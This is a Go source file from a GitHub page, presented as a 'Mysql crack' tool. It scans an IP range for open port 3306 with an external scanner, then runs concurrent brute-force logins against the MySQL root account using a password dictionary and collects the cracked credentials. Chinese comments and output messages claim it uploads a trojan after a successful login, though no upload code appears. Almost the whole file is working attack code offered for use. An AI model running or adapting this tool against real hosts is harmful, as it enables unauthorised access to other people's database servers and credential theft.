-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy path1.go
148 lines (139 loc) · 3.55 KB
/
1.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
package main
import (
"fmt"
"github.com/ziutek/mymysql/mysql"
_ "github.com/ziutek/mymysql/native" // Native engine
"os"
"os/exec"
"time"
"C"
"io/ioutil"
"strings"
"runtime"
"sync"
)
type ScanMysql struct {
dist []string
result map[string]string
}
//ScanPort
func (self *ScanMysql) ScanPort(startip, endip, port, thread string) {
cmd := exec.Command(`s.exe`, `tcp`, startip, endip, port, thread, "/save")
cmd.Stdout = os.Stdout
if err := cmd.Run(); err != nil {
fmt.Println("Error: ", err)
}
cmd.Run()
fmt.Println("Scan success..")
}
func (slef *ScanMysql) crack(host, user, pass, port, dbname string) (bool, *mysql.Conn) {
db := mysql.New("tcp", "", host+":"+port, user, pass, dbname)
db.SetTimeout(4 * time.Second)
err := db.Connect()
if err != nil {
db.Close()
return false, nil
}
return true, &db
}
func (slef *ScanMysql) Attack(iparr []string){
list := slef.dist
var ip string
ch := make(chan int)
for _,ip = range(iparr){
go slef.run(list,ip,ch)
}
<-ch
}
func (slef *ScanMysql)run(list []string,ip string,ch chan int) {
var pass string
wg := sync.WaitGroup{}
for _,pass = range(list){
wg.Add(1)
go slef.run2(pass,ip,&wg)
}
wg.Wait()
ch<-1
}
func (slef *ScanMysql)run2(pass,ip string,wg *sync.WaitGroup){
pass = strings.TrimSpace(pass)
ip = strings.TrimSpace(ip)
is_login,_ := slef.crack(ip,"root",pass,"3306","mysql")
fmt.Printf("\r\nCracking: %s root-%s",ip,pass)
//爆破成功,上传木马执行
if is_login{
fmt.Println(" 爆破成功,正在上传木马....\r\n")
slef.result[ip] = pass
// wg.Done()
// os.Exit(2)
} else {
fmt.Println(" 连接失败\r\n")
}
wg.Done()
}
func ( *ScanMysql) ipformat()[]string {
f,err:= os.Open("Result.txt")
if err !=nil{
fmt.Println(err)
}
res,err := ioutil.ReadAll(f)
if err !=nil{
fmt.Println(err)
}
str := string(res)
arr := strings.Split(str,"\n")
l := len(arr)-4
arrs := arr[2:l]
var newarr []string
for _,v := range(arrs){
v = strings.Replace(v," 3306 Open ","",-1)
// fmt.Println(i,v)
newarr = append(newarr,v)
}
f.Close()
os.Remove("Result.txt")
return newarr
}
func main() {
os.Remove("Result.txt")
runtime.GOMAXPROCS(runtime.NumCPU())
fmt.Printf("\r\n------------------------------------------------------------------------------\r\n")
fmt.Printf(" Welcome to use Mysql crack! qq:1141056911\r\n")
fmt.Printf(" By Lcy \r\n")
fmt.Printf(" http://phpinfo.me \r\n")
fmt.Printf("------------------------------------------------------------------------------\r\n")
if len(os.Args) != 4 {
fmt.Printf("Usage: %s StartIP EndIP ThreadNumber", os.Args[0])
os.Exit(1)
}
StartIP := os.Args[1]
EndIP := os.Args[2]
Thread := os.Args[3]
fmt.Printf("Scaning to %s-%s\r\n",StartIP,EndIP)
time.Sleep(1 * time.Second)
//初始化mysql对像
obj := ScanMysql{}
obj.ScanPort(StartIP, EndIP, "3306", Thread)
//开放3306端口的ip
iparr := obj.ipformat()
//读取字典文件
f,err:= os.Open("pass.txt")
if err !=nil{
fmt.Println(err)
}
res,err := ioutil.ReadAll(f)
if err !=nil{
fmt.Println(err)
}
str := string(res)
obj.dist = strings.Split(str,"\n")
fmt.Printf("\r\nIP段扫描完毕,程序即将开始爆破密码...\r\n")
time.Sleep(1 * time.Second)
//启动线程开始爆破,爆破成功则自动上传木马
obj.result = make(map[string]string)
obj.Attack(iparr)
//爆破结果
for k,v := range(obj.result) {
fmt.Printf("爆破成功: %s root-%s\r\n ",k,v)
}
}